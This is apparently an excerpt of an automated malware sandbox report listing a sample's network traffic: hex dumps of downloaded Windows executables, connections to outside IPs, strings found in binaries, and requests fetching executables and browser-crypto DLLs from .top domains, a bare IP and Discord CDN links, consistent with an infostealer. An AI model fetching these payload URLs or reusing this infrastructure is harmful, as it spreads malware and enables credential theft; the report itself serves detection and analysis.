                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0
                Source: global trafficTCP traffic: 192.168.2.3:49978 -> 93.115.20.139:28978
                Source: global trafficTCP traffic: 192.168.2.3:50095 -> 213.142.148.231:58682
                Source: global trafficTCP traffic: 192.168.2.3:50109 -> 185.215.113.94:15564
                Source: global trafficTCP traffic: 192.168.2.3:50115 -> 2.56.214.190:59628
                Source: D8D0.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: CD17.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: D8D0.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: CD17.exe.10.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: CD17.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: D8D0.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: CD17.exe.10.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: D8D0.exe.10.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: D8D0.exe.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: CD17.exe.10.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: D8D0.exe.10.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: CD17.exe.10.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: B096.exe, B096.exe.10.drString found in binary or memory: http://fontello.com
                Source: D8D0.exe.10.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: CD17.exe.10.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: D8D0.exe.10.drString found in binary or memory: http://ocsp.digicert.com0O
                Source: CD17.exe.10.drString found in binary or memory: http://ocsp.sectigo.com0
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: DF3A.exe.10.drString found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
                Source: D8D0.exe.10.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: sqlite3.dll.35.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://accounts.google.com
                Source: craw_window.js.34.drString found in binary or memory: https://accounts.google.com/MergeSession
                Source: B096.exe, 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, aspnet_state.exe, 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, DF3A.exe, 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, ServiceModelReg.exe, 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://apis.google.com
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
                Source: B096.exeString found in binary or memory: https://cdn.discordapp.com/attachments/8
                Source: DF3A.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
                Source: DF3A.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
                Source: D8D0.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
                Source: BBE1.exe, 0000001B.00000000.422812164.0000000000792000.00000002.00020000.sdmp, BBE1.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
                Source: FD36.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpg
                Source: DEDC.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg
                Source: DEDC.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg
                Source: DEDC.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpg
                Source: DEDC.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpg
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://clients2.google.com
                Source: manifest.json.34.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://clients2.googleusercontent.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.drString found in binary or memory: https://content-autofill.googleapis.com
                Source: Reporting and NEL.36.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external
                Source: f3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp.36.dr, f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://dns.google
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://fonts.googleapis.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://fonts.gstatic.com
                Source: craw_window.js.34.dr, craw_background.js.34.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                Source: Network Action Predictor.34.drString found in binary or memory: https://js.monitor.azure.com/
                Source: Reporting and NEL.36.drString found in binary or memory: https://mdec.nelreports.net/api/report?cat=mdocs
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://ogs.google.com
                Source: craw_window.js.34.dr, manifest.json.34.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://play.google.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.drString found in binary or memory: https://r4---sn-4g5e6nss.gvt1.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.drString found in binary or memory: https://redirector.gvt1.com
                Source: craw_window.js.34.dr, manifest.json.34.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: CD17.exe.10.drString found in binary or memory: https://sectigo.com/CPS0D
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://ssl.gstatic.com
                Source: craw_window.js.34.dr, craw_background.js.34.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                Source: D8D0.exe.10.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://www.google.com
                Source: manifest.json.34.drString found in binary or memory: https://www.google.com/
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/images/cleardot.gif
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/images/dot2.gif
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/images/x2.gif
                Source: craw_background.js.34.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, craw_window.js.34.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr, craw_background.js.34.drString found in binary or memory: https://www.googleapis.com
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/sierra
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://www.gstatic.com
                Source: unknownDNS traffic detected: queries for: xacokuo8.top
                Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
                Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
                Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
                Source: global trafficHTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                Source: global trafficHTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
                Source: global trafficHTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
